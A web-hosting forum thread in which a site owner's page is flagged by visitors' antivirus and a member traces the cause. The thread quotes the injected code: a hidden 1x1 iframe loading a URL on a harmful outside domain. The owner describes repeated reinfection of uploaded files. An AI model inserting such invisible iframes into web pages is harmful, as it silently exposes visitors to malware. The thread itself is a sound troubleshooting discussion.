can you review my site?

wjh2303

Reaction score
avast picked up a virus. you have one of two options:
1) piss off and die for trying to infect people
2) beef up your passwords and contact x10 because youve been hacked

risendead

Reaction score
scared the crap out of me lol. I didn't realize that avast protected me while surfing the net. :)

reer reer caution a virus has been detected.

Should of read the review before I clicked the link but at least I think it was blocked. :)

adamparkzer

On Extended Leave
Reaction score
I found the source of your virus problem - the last line of your source code is this:
Code:
<iframe src="http://niklejo.net/?click=2403C9" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
When I Googled that website, it said that the specified site may harm your computer. So basically, whatever you intended to do with that IFRAME isn't working out too good for the people that are visiting your website. For information about the above website, visit the following link:

http://www.google.com/safebrowsing/diagnostic?site=http://niklejo.net/&hl=en

lucman_noor

Reaction score
Thank you guys for the concern. Yes thats the problem with my website and i know the code. and u know what everytime i change the code of my site and make it clean then upload to server and browsing to my site again my gdata totalcare 2009 detects the virus. Im sending a message to x10hosting staff and waiting for their reply because the virus seems to be repeating the infection..I scan my files through their clamv antivirus and it quarantine some html..so again i uploaded my webpages but then virus still infected my webpages speacially the index file.

adamparkzer

On Extended Leave
Reaction score
I'm not 100% sure how the line of code is getting there then. Were you trying to say that you think a virus is editing HTML files that you make, and adding that line of code to your website right before you upload it to the x10Hosting server?

lucman_noor

Reaction score
no thats not what i mean..after uploading my files to server it then infects what ive uploaded..i remember one time im using filezilla ftp client to upload to my server using pc from a cafe and then i remember after uploading I saw a image.exe in my images folder in my server then i logout then login again, after login i went to my images folder and image.exe it not there its seems its hiding..could you please help me

adamparkzer

On Extended Leave
Reaction score
I'm not sure how a virus could ever infect a file after you upload to the server. The only way that could happen is if the virus edits the document that's already in x10Hosting's servers, and I'm not sure how legitimate that sounds. Have you tried using the File Manager and editing the file from inside your cPanel?

adamparkzer

On Extended Leave
Reaction score
thanks guys for the help..I think its back to normal now..pray over please
I don't have anti-virus software that monitors my internet connection like the first two reviewers did, so I can't tell you if any anti-virus programs block the site. However, I checked your code again, and the line of code that was probably causing the issue is now gone.